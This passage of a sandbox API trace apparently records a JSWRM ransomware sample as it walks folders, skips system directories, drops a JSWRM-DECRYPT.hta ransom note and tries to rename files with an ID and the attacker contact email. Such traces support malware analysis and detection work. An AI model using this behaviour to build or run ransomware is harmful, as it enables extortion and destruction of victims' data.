ftLastAccessTime.dwLowDateTime=0xa0c5f95f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fdc097c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName=".", cAlternateFileName="")) returned 0x231c80 [0069.115] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.115] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c5f95f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fdc097c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="..", cAlternateFileName="")) returned 1 [0069.115] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.115] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.115] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0cb0a3f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71169cb5, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="ado", cAlternateFileName="")) returned 1 [0069.115] lstrcmpiW (lpString1="ado", lpString2=".") returned 1 [0069.115] lstrcmpiW (lpString1="ado", lpString2="..") returned 1 [0069.115] lstrcmpiW (lpString1="ado", lpString2="...") returned 1 [0069.115] lstrcmpiW (lpString1="ado", lpString2="windows") returned -1 [0069.115] lstrcmpiW (lpString1="ado", lpString2="recovery") returned -1 [0069.116] lstrcmpiW (lpString1="ado", lpString2="perflogs") returned -1 [0069.116] lstrcmpiW (lpString1="ado", lpString2="documents and settings") returned -1 [0069.116] lstrcmpiW (lpString1="ado", lpString2="$RECYCLE.BIN") returned 1 [0069.116] lstrcmpiW (lpString1="ado", lpString2="system volume information") returned -1 [0069.116] lstrcmpiW (lpString1="ado", lpString2="msocache") returned -1 [0069.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0069.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0069.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0069.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0069.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0069.116] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\ado\\jswrm-decrypt.hta")) returned 0xffffffff [0069.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0069.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0069.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0069.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0069.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0069.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0069.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0069.118] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\ado\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0069.119] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.119] WriteFile (in: hFile=0x298, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0069.120] CloseHandle (hObject=0x298) returned 1 [0069.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0069.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0069.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0069.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0069.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0069.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0069.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0069.120] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\ado\\jswrm-decrypt.hta")) returned 0x20 [0069.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0069.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0069.120] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\ado\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0cb0a3f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fdc097c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName=".", cAlternateFileName="")) returned 0x231f80 [0069.121] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.121] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0cb0a3f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fdc097c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="..", cAlternateFileName="")) returned 1 [0069.121] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.121] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.121] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a0c6a1, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x52a0c6a1, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x52a0c6a1, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3a08, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="adojavas.inc", cAlternateFileName="")) returned 1 [0069.121] lstrcmpiW (lpString1="adojavas.inc", lpString2=".") returned 1 [0069.121] lstrcmpiW (lpString1="adojavas.inc", lpString2="..") returned 1 [0069.121] lstrcmpiW (lpString1="adojavas.inc", lpString2="...") returned 1 [0069.121] lstrcmpiW (lpString1="adojavas.inc", lpString2="windows") returned -1 [0069.121] lstrcmpiW (lpString1="adojavas.inc", lpString2="recovery") returned -1 [0069.121] lstrcmpiW (lpString1="adojavas.inc", lpString2="perflogs") returned -1 [0069.121] lstrcmpiW (lpString1="adojavas.inc", lpString2="documents and settings") returned -1 [0069.121] lstrcmpiW (lpString1="adojavas.inc", lpString2="$RECYCLE.BIN") returned 1 [0069.121] lstrcmpiW (lpString1="adojavas.inc", lpString2="system volume information") returned -1 [0069.121] lstrcmpiW (lpString1="adojavas.inc", lpString2="msocache") returned -1 [0069.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0069.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="adojavas.inc", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="adojavas.inc", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="adojavas.inc", lpUsedDefaultChar=0x0) returned 12 [0069.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0069.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="adojavas.inc", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="adojavas.inc", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="adojavas.inc", lpUsedDefaultChar=0x0) returned 12 [0069.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0069.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0069.121] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.123] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9167624875316888) returned 0 [0069.123] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.123] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0069.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.123] CloseHandle (hObject=0xffffffff) returned 1 [0069.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0069.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0069.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0069.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0069.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0069.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ecb8 [0069.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.123] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), lpNewFileName="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0069.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0069.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0069.124] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x529e643a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x529e643a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x529e643a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3b5b, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="adovbs.inc", cAlternateFileName="")) returned 1 [0069.124] lstrcmpiW (lpString1="adovbs.inc", lpString2=".") returned 1 [0069.124] lstrcmpiW (lpString1="adovbs.inc", lpString2="..") returned 1 [0069.124] lstrcmpiW (lpString1="adovbs.inc", lpString2="...") returned 1 [0069.124] lstrcmpiW (lpString1="adovbs.inc", lpString2="windows") returned -1 [0069.124] lstrcmpiW (lpString1="adovbs.inc", lpString2="recovery") returned -1 [0069.124] lstrcmpiW (lpString1="adovbs.inc", lpString2="perflogs") returned -1 [0069.124] lstrcmpiW (lpString1="adovbs.inc", lpString2="documents and settings") returned -1 [0069.124] lstrcmpiW (lpString1="adovbs.inc", lpString2="$RECYCLE.BIN") returned 1 [0069.124] lstrcmpiW (lpString1="adovbs.inc", lpString2="system volume information") returned -1 [0069.124] lstrcmpiW (lpString1="adovbs.inc", lpString2="msocache") returned -1 [0069.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="adovbs.inc", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="adovbs.inc", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="adovbs.inc", lpUsedDefaultChar=0x0) returned 10 [0069.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0069.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="adovbs.inc", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="adovbs.inc", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="adovbs.inc", lpUsedDefaultChar=0x0) returned 10 [0069.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0069.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0069.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0069.124] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.125] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9174325024298648) returned 0 [0069.125] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.125] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0069.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.125] CloseHandle (hObject=0xffffffff) returned 1 [0069.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0069.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0069.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0069.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0069.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0069.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ecb8 [0069.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.126] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), lpNewFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0069.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0069.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0069.126] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0cb2730, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="en-US", cAlternateFileName="")) returned 1 [0069.126] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0069.126] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0069.126] lstrcmpiW (lpString1="en-US", lpString2="...") returned 1 [0069.126] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0069.126] lstrcmpiW (lpString1="en-US", lpString2="recovery") returned -1 [0069.126] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0069.126] lstrcmpiW (lpString1="en-US", lpString2="documents and settings") returned 1 [0069.126] lstrcmpiW (lpString1="en-US", lpString2="$RECYCLE.BIN") returned 1 [0069.126] lstrcmpiW (lpString1="en-US", lpString2="system volume information") returned -1 [0069.126] lstrcmpiW (lpString1="en-US", lpString2="msocache") returned -1 [0069.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0069.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0069.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0069.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0069.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2179e0 [0069.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0069.126] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\jswrm-decrypt.hta")) returned 0xffffffff [0069.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2179e0 | out: hHeap=0x1e0000) returned 1 [0069.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 